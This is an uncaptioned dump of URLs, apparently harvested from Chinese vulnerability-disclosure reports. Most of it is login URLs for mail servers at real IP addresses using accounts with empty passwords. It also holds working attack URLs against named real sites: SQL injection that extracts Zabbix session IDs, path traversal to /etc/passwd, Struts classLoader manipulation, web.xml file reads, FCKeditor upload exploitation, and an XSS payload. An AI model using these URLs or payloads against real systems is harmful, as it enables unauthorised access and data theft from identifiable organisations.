http://218.200.234.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise 
http://119.97.235.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.25.155.38/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise 
http://59.151.39.54/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.93.44.214/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.93.44.214/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://49.5.0.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.178.189.138/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://115.239.177.6/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://59.108.58.106/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://59.108.58.106/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise 
http://219.136.251.32/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.136.251.32/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.76.65.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://49.5.0.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://223.72.166.178/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.85.210.134/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://220.231.9.108/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise 
http://113.108.217.131/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://122.225.54.86/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.225.54.86/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://112.25.179.84/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://112.25.179.84/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.76.65.142/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise 
http://61.143.225.199/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.42.107.149/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://117.40.130.53/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise 
http://222.186.81.40/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise 
http://125.46.95.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.104.3.125/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.76.65.142/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise 
http://61.189.86.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://220.231.9.108/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.92.205.170/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.92.205.170/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.92.205.170/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise 
http://113.108.217.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.209.94.94/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise 
http://202.114.35.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.248.14.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.248.14.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.76.65.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.25.155.38/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.199.112.6/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise 
http://114.80.204.38/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://m.huxiu.com/add_user_post_comment http://www.wandafilm.com/baseInfo/news/news.do?cate_id=900&items_per_page=1&m=ajaxServiceList&rond=0.5514420296531171&&showIndex=1 http://www.wandafilm.com/setCity.do?code=8022251040&m=film_info_init_next&reqUrl=http://www.wooyun.org https://www.dhc.net.cn/info/Qrealreport_detail.jsp?q10_id=5 http://220.168.30.69:8080/webmail/admin/index.php http://220.168.30.69:6011/collectdata/ http://220.168.30.69:6020/hnkj/wb/space/IndexAction.do?method=index http://www.acpaa.cn/的搜索处。 www.acpaa.cn http://www.acpaa.cn http://wooyun.org/bugs/wooyun-2014-053145 http://www.js.chinaunicom.com/shop/template/shop/order_query.shtml http://www.js.chinaunicom.com/shop/shop/order/ShopOrderQuery.do http://183.56.130.180:9003/isp/ent/registerviewByPro?pc=01030000 http://219.142.42.17:8010/ESCM/account/login.do http://219.142.42.17:8010/ESCM/provider/toProviderSelect.do http://219.142.42.17:8010 http://www.wh12333.gov.cn/)几个应用系统存在weblogic控制台弱口令: https://221.232.64.242:7022/grws/login.jsp https://221.232.64.242:7022/console https://221.232.64.242:7002/dwws/login.jsp https://221.232.64.242:7002/console https://221.232.64.242:7012/sqws/login.jsp https://221.232.64.242:7012/console http://www.sanfu.com/?mod=faq&do=agreement&action=agreement&sid=a05eeebf274a415a4096d3e279e9395e http://www.sanfu.com/?mod=faq&do=agreement&action=agreement&sid=a05eeebf274a415a4096d3e279e9395e http://www.mhxx.renren.com/plus/flink_add.php inurl:News_Detail.asp?News_BigClass_ID http://www.coca-cola.com.cn/admin/user/login.aspx http://218.57.170.91:8080/ http://218.57.170.91:8080/adduser.asp http://218.57.170.91:8080/modify.asp http://218.57.170.91:8080/view.asp?dd=69701 http://192.***.**.60/uniteservice/ http://192.***.**.60/wwwdata/ http://192.***.**./iAgent/ HTTP://192.***.**.60/LocalInfoData/ http://www1.gdufs.edu.cn/gwyjs/yjsc/admin/admin_login.php?action=logout 
http://vote.weibo.com/index/getByType http://vote.weibo.com/index/getByType http://cpc-gov.cn/ http://cpc-gov.cn/a/a/a.asp http://61.156.14.159:8088/newmapware/Main.aspx http://219.133.34.198:8080/ http://183.60.143.160:8086/ http://211.162.125.200:8080/ http://gpsweb.hn-dg.cn:8086/ http://59.39.182.131:81/ http://www.anxgps.com:6000/ http://ffyj.bgpintl.com/Web/home.aspx http://ffyj.bgpintl.com/upload/upload.aspx http://gz.189.cn/service/pay/pay_charge/ifr_balance_short.jsp data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4= http://vosuat.sf-express.com/index.php?m=content&c=index&a=lists&catid=6 http://admin.loupan99.com/login.aspx http://act2.aion.sdo.com/aion5th/Server/Data/Aion5th_ActionArea26_Code.server.ashx?method=add&Code=注入风险 site:www.hnrpc.com http://www.hnrpc.com:85/zsb/zcfg_view.asp?id=72 www.loufeng.gov.cn/news_show.php?id=7070 http://www.zh8888.com/admin/index.php http://ats.lenovo.com.cn/ http://wbm.whu.edu.cn/admin/login.php http://obama.freecomm.cn/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 http://211.151.82.56:8080/pbx/device http://jobs.shanghaitech.edu.cn/job.asp?id=48 VERSION:1.2.2 http://config.baofeng.com/ http://www.wuhanmsa.gov.cn/message.aspx?id= http://wbm.whu.edu.cn/jcnr.php?mid=18&sid=9&id=958&tag=2 http://www.ctsat.cn/ http://www.ctsat.cn/Html/viewHtml/viewHtml.aspx?htmlLv=7&htmlType=YeWu http://www.ctsat.cn/Html/viewHtml/XinWenList.aspx?htmlLv=3&htmlType=-1 http://www.ctsat.cn/Html/viewHtml/listViewHtml.aspx?ID=c1bb6337-964f-498a-8f78-e9b94ece1b63 http://office.189.cn/login.jsp http://office.189.cn/sysPwdQuestion!check.do http://119.134.83.94/,无线ap弱口令登陆,可以控制该ap http://118.180.8.71/login.jsp http://118.180.8.71/examples/cal2.jsp http://bk.11185.cn/order/mynameaddrbook.do?method=findMynameaddrbookmain http://bk.11185.cn http://guest.lenovo.com.cn http://guest.lenovo.com.cn/api/index/search.php?debug=true&search=1 http://www.0543tuangou.com/ site:g.xunlei.com inurl:profile 
http://luyou.xunlei.com/space-uid-5643.html http://119.188.128.110 http://103.15.200.110 http://www.juniper.net/support/downloads/ www.juniper.net下载 http://www.hotel.hc360.com/hotel.zip http://m.tiantian.com/m.tiantian.com.rar http://m.tiantian.com/login/login.rar http://www.bksms.sdu.edu.cn/ http://plan.nju.gov.cn/Jingdian_Info2.aspx?id= http://plan.nju.gov.cn/ExistedStaticLine_Info.aspx?id= http://plan.nju.gov.cn/GHandler.ashx?type=Jingdian&name= http://plan.nju.gov.cn/admin/Shell/index.aspx http://sms.nju.gov.cn/login.html http://pldltjw.net/login.aspx http://pldltjw.net/index.aspx,如下图所示: http://www.zoomla.cn/Class_30/NodeNews_1.aspx?n= http://sfj.yueyang.gov.cn/open.php?typeid=45 http://119.188.128.223 http://103.15.200.223 http://www.aeromexico.cc/aeromexico.rar http://xss.xxx/ http://hysz.nju.edu.cn:7000/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3 http://59.108.229.254:8088/user/gotoLoginPage.action http://59.108.229.254:8088/user/gotoLoginPage.action?class['classLoader'].resources.dirContext.docBase= http://yuntu.baidu.com/yuntu_manage/site/install http://www.yjxgtj.gov.cn/lm.php?typeid=14 http://house.focus.cn/common/modules/survey/survey_submit.php http://house.focus.cn/common/modules/survey/survey_submit.php http://www.ibreezer.com//fckeditor/editor/filemanager/connectors/test.html http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx 
http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/frmupload.html http://www.ibreezer.com//UploadFiles/FckFiles/file/a_asp;a.jpg 
http://zabbix.53rj.com.cn/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://zabbix.53rj.com.cn/scripts.php打开是空白,猜测已被黑,并且黑客改了内容,不想再被其他人入侵 http://museum.ustb.edu.cn//data/mysql_error_trace.inc http://tongji.baidu.com/data/mobile/brand,找到最下面,有一个下载图片的功能,点击【下载图片】并抓包,可以得到以下请求。 http://tongji.baidu.com/data/mobile/chart/save http://www.w3.org/2000/svg\ xmlns:xlink=\"http://www.w3.org/1999/xlink\ http://db.178.com/wow/cn/hscards.html?rarity=1&search=1 http://www.heerit.com/dxanli.htm http://www.google.de/#filter=0&newwindow=1&q=inurl:/forget_password.jsp+%22%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%22 https://www.google.co.in/search?ix=aca&sourceid=chrome&ie=UTF-8&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8C%97%E4%BA%AC%E5%B8%8C%E5%B0%94%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://seecom.zte.com.cn http://mei.tiantian.com/pd41535.html GET:pd41535.html http://mei.tiantian.com/pd41535'and'1'='1.html http://mei.tiantian.com/pd41535'and'1'='2.html http://movie.douban.com/people/87875320/ http://www.ali213.net/vote2012/gamevote.asp http://m.sanfu.com/reg/forgetpw_step3.htm http://shop.letv.com/product/product-pid-GWGT501005.html www.mba.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.edp.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.mba.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.evolution.ynu.edu.cn/web.rar 